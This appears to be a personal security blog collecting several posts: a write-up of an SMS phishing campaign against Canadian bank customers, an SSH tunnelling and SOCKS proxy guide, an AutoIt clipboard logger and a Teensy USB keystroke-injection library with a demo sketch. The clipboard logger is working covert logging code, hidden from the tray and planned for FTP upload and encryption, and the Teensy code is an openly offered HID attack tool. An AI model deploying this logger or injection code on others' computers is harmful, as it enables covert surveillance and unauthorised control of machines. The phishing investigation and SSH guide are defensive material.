Unmasking a Phishing campaign targeting major Canadian Banking customers

It was a lazy Sunday afternoon when I got a Twitter alert regarding a SMS Phishing customers of Royal Bank of Canada (RBC)

Smishing (SMS + Phishing)

Smishing (SMS + Phishing)

Being my natural curious self on a slow afternoon I started poking around the site and quickly discovered 2 things:

  1. hxxp://rbc[.]com[.]ssl-sec-mls-119[.]com/r/ - the /r/ portion intrigued me

  2. I also found a page called /r/counter/ from analyzing the form submission page

rbc1.jpg

Going through the data in the counter page I quickly realized that these IP addresses belong to potential victims. out of the 701 records 60 users ~ 10% submitted all the data to the attacker. Sample below.

rbc2.jpg

Now with this knowledge in mind I wanted to get back to the /r/ and fuzz that letter to see what else returned a HTTP status 200. I hypothesized that the ‘r’ in /r/ stood for “RBC” so I wanted to try ‘/c/’ for “CIBC” and to my delight i got a status 200 and a familiar looking website.

cibc1.jpg

My immediate a next step was to determine if this has already been used to phish unsuspecting victims and made my way over to “/c/counter/” this time to my surprise I saw a total count of 1068 potential victims at approximately 10% that provided all information to the attacker. At this point I decided to fuzz ‘a..z’ and see if I get a status 200. I also wanted to collect the data from counter page. I was also convinced at this point that this attacker has been doing this for some time and I had to do something to unmask the operation and the infrastructure at the very least. The research uncovered 6 phishing pages targeting customers of the following Canadian banks.

  1. BMO - /b/

  2. CIBC - /c/

  3. RBC - /r/

  4. Desjardins - /d/

  5. Tangerine - /t/

  6. Scotia Bank - /s/

It was also obvious that all these sites were used or in use to phish Canadians.

counters.JPG

The Infrastructure

  1. IP - 47[.]74[.]225[.]213

  2. URL - http://rbc[.]com[.]ssl-sec-mls-119[.]com/r/

The domain was registered on the 29th of December, 2018.

Hosted on  Alibaba cloud

Hosted on Alibaba cloud

111 Parent domains  -  https://pastebin.com/shzRhwGd

111 Parent domains - https://pastebin.com/shzRhwGd

We notified the banks and saw response from CIBC and RBC. All the domains hosted on this server looked shady and build for crypto currency online casinos and phishing. Checkout the Pastebin link if you are interested. Once interesting finding from the logs was a submission from ::1 / loop back address from March 03, 2018. This further confirms that we are dealing with a persistent threat actor.

The attacker testing if the code works? Thoughts?

The attacker testing if the code works? Thoughts?

I would love to hear what you guys think. How should law enforcement and authorities respond to something like this? Do you feel the banks should do more to identify the impacted users and notify them? Thanks for reading my slow Sunday afternoon turned out to be fun and I hope you guys had fun reading.

SSH Tunnelling & Secure Browsing: Part III

ssh -D 8080:localhost

This time I will go over setting up SSH client in Linux, setting up key pairs and how to implement keys for authentication in Linux and in Windows.

Setting up tunnelling in Linux is as easy as typing in:

 

Read More

SSH Tunnelling & Secure Browsing: Part II

If you have completed Part I. You should have a running SSH server ready to tunnel all your needs. If you are on a PC running Microsoft's Windows operating system like me, download PuTTY 0.62-installer.exe from http://the.earth.li/~sgtatham/putty/latest/x86/putty-0.62-installer.exe and install it.PuTTY will be our SSH client and we are going to cover:

  1. Password Authentication
  2. Asymmetric Key based authentication (RSA)

The second method being the most secure if implemented properly. Once Putty is installed it should have created an icon on your desktop. Open Putty and you will see the screen below:

Default PuTTY Screen

Fill up the fields as necessary Host Name: [username]@[server name]|[IP address] Port: The default port is 22 *** Connection type: SSH Saved Sessions: [Any name of your liking]

Once this information is filled in click on "Connection" > expand "SSH" > "Tunnels" and fill the tunnel information.

Tunnel Configuration

Click Add when done. On the menu to the left scroll all the way up and click "Session"and then click "Save" to save changes to the configuration. Click "Open" to launch the connection PuTTY will prompt that the Key is not recognized if this is the first time you are connecting. Click Yes to save the key in registry. I will go over key verification in another post. You will be prompted for your password at this stage. Please type it to complete the process. Once in open your browser of choice change the Proxy settings to SOCKSv5 Server / IP = 127.0.0.1, Port: 8090 and you will be tunneling traffic like 1337.

Part III will cover setting up SSH client in Linux, Public / Private key based encryption  in Linux and Windows. Hope you enjoyed, please comment below.

SSH Tunnelling & Secure Browsing: Part I

Checking your Facebook page from Starbucks? Checked your banking information from the Hotel WiFi? Or are you going to Defcon this year? 

Public internet is not secure and there is a need for secure browsing. There are many ways to achieve this and Obfuscate the traffic for eavesdroppers and protect ourselves against Man In The Middle (MITM) attack. After trying a few different solutions like torProject, Hotspot Shield and a few others like it I decided to set up my own SSH Server so that I can create a secure tunnel between my laptop and the SSH server and use that as a SOCKSv5 proxy. If you are still interested I will try to cover the following topics over the next few days:
  1. Install and configure a SSH Server (FreeBSD 9.0)
  2. Create users.
  3. Secure and harden the server.
  4. Configure SSH client (PuTTY) in windows
  5. Create Public and Private keys for authentication
  6. Set up Password-less login.
I wanted to point out that FreeBSD is really stable and uses very little resources to run and is my server of choice. I have tested the same with Debian 6.0.4 and works just as good. All the steps I am about to show should be easy to replicate on all *NIX type systems. I also wanted to point out that a Virtual Private Server will give you the best performance over hosting the SSH server at home.
Server Specs:

Installation Steps:

  1. Create the Guest Machine Guest VM Configuration
  2. Save and Power On. VM should boot from DVD press Enter to continue.
  3. Play this video for actual installation step

Configuration Steps:

  • Create a new user by typing "adduser" then Enter. P.S. add user to "wheel" group so that user can invoke "SU -"

FreeBSD Account Setup

  •  Login as the newly created user
  • mkdir ~/.ssh
  • chmod 700 .ssh
  • su -
  • Enter root password
  • cp /etc/ssh/sshd_config ~/sshd_config.orig
  • cd /home/n3onli8
  • cp /etc/ssh/sshd_config /home/n3onli8/sshd_config
  • vi sshd_config
  • I configured it to look like:

Protocol 2 HostKey /etc/ssh/ssh_host_rsa_key HostKey /etc/ssh/ssh_host_dsa_key

KeyRegenerationInterval 1h ServerKeyBits 1024 LoginGraceTime 2m PermitRootLogin no #StrictModes yes PubkeyAuthentication yes AuthorizedKeysFile    %h/.ssh/authorized_keys # Change to NO to enable built-in password authentication. PasswordAuthentication yes PermitEmptyPasswords no UsePAM no AllowAgentForwarding yes AllowTcpForwarding yes GatewayPorts yes X11Forwarding yes X11DisplayOffset 10 X11UseLocalhost yes PrintLastLog yes TCPKeepAlive yes PermitTunnel yes # override default of no subsystems Subsystem    sftp    /usr/libexec/sftp-server

  • Quit and Write changes
  • rm /etc/ssh/sshd_config
  • mv /home/n3onli8/sshd_config  /etc/ssh/sshd_config
  • /etc/rc.d/sshd restart
  • exit (exit su)

man ssh for better understanding of sshd_config

Part II will cover setting up putty in MS Windows

Thanks for reading. Comment below

Autoit: Clipboard Logger

This code will create an Executable approximately 300KB that will run on your computer logging clip board data to a text file in  %USERPROFILE%\ClipLog.log
  1. Download Autoit from http://www.autoitscript.com/site/
  2. Open SciTE
  3. Copy the code from below and paste it in SciTE
  4. Save the file and hit F5 to test the script
  5. Browse to %USERPROFILE%
  6. Open ClipLog.log to view logged clip board text.
  7. If it's all good then Ctrl + Break to stop the script
  8. Then Ctrl + F7 to compile the program into a .EXE
Stuff for version 2.0
  • Copy Log to ftp
  • Auto start program on power on.
  • encrypt the data in the log to hide the information.
; Clippy.au3
; n3onli8, 22, 12, 2011
; Version 1.0



#NoTrayIcon
#include <File.au3>
#include <Clipboard.au3>


While 1
$Clippy = _ClipBoard_GetData()
if $Clippy <> "0" Then
if $Clippy <> $txtClipboard Then
_FileWriteLog(@UserProfileDir & "\ClipLog.log",$Clippy)
EndIf
EndIf
$txtClipboard=$Clippy
Sleep(100)
WEnd
Exit

Enjoy, Comment below.

<< iPrank >> Teensy ++

Enjoy Demo of n3onli8.h: http://pastebin.com/7dhjJdfN

#include <n3onli8.h>

void AltF(){
   Keyboard.set_modifier(MODIFIERKEY_ALT);
   Keyboard.send_now();
   Keyboard.set_key1(KEY_F);
   Keyboard.send_now();
   delay(200);
   Keyboard.set_modifier(0);
   Keyboard.set_key1(0);
   Keyboard.send_now();
   delay(200);
}

void setup(){
  Serial.begin(9600);
  delay(2500);
  Minimize();
  delay(200);
  PrintScreen();
  delay(200);
  Menu();
  delay(500);
  Keyboard.print("V");
  delay(200);
  Keyboard.print("D");
  delay(200);
  StartRUN();
  delay(500);
  Keyboard.print("mspaint.exe");
  delay(200);
  Enter();
  delay(350);
  Paste();
  delay(200);
  Save();
  delay(200);
  Keyboard.print("%USERPROFILE%\\h4ck.bmp");
  delay(200);
  Enter();
  delay(500);
  AltF();
  delay(100);
  Keyboard.print("K");
  delay(100);
  Keyboard.print("F");
  delay(100);
  AltF4();
  delay(200);
  Minimize(); //Restoring Windows GUI+D
}

void loop(){
}

n3onli8.h Advanced PHUKD Library Complete

Finally Completed building the n3onli8.h teensy library for HID attacks. I wanna call this version 0.1 since I have big plans for this library. Hope you guys Enjoy:

/*********************n3onli8.h**************************/

#ifndef N3ONLI8_H_INCLUDED
#define N3ONLI8_H_INCLUDED

#include "WProgram.h"

void CtrlAltDel();
void StartRUN();
void Enter();
void PrintScreen();
void Minimize();
void Menu();
void AltF4();
void Paste();
void Save();

#endif
/*******************************************************/
//http://pastebin.com/haVm6smL

/************************n3onli8.cpp**********************/

#include "WProgram.h"
#include "usb_private.h"
#include "usb_api.h"
#include "n3onli8.h"

void CtrlAltDel()
{
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_DELETE);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1500);
}

void StartRUN()
{
    Keyboard.set_modifier(MODIFIERKEY_GUI);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_R);
    Keyboard.send_now();
    delay(1500);
 
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();  
    Keyboard.set_key1(KEY_BACKSPACE);
    Keyboard.send_now();
    delay(100);

    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(100);
}

void Enter()
{
    Keyboard.set_key1(KEY_ENTER);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
}

void PrintScreen()
{
Keyboard.set_key1(KEY_PRINTSCREEN);
Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
}

void Minimize()
{
    Keyboard.set_modifier(MODIFIERKEY_GUI);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_D);
    Keyboard.send_now();
    delay(300);

Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Menu()
{
  Mouse.set_buttons(0, 0, 1);
  Mouse.set_buttons(0, 0, 0);
}

void AltF4()
{
    Keyboard.set_modifier(MODIFIERKEY_ALT);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_F4);
    Keyboard.send_now();
    delay(200);

Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Paste(){
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.set_key1(KEY_V);
Keyboard.send_now();
delay(200);
Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Save(){
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.set_key1(KEY_S);
Keyboard.send_now();
delay(200);
Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}
/**********************************************************/
//http://pastebin.com/YKPc6pgK

Save the 2 files in a folder called n3onli8.h and copy the folder in your Arduino\Libraries folder.
Remember >> Great Power Great responsibilities...
Cheers !!!

Other people that deserve my gratitude for HID hacking...

I have been researching online for other people who have been working along the lines of using a teensy or a similar HID device as a penetration testing tool. Check out these fellows:
  • Adrian Crenshaw at irongeek.com, has done some amazing work on the teensy platform. Had I been at Defcon 18, I would have known that he started this project back in 2010. Check out this page for information on his research and the Programmable HID USB Keystroke Dongle (PHUKD) Library.
  • Darren Kitchen from Hak5.org has been working on a project he likes to call the USB Rubber Ducky. Check out their forum to find out more.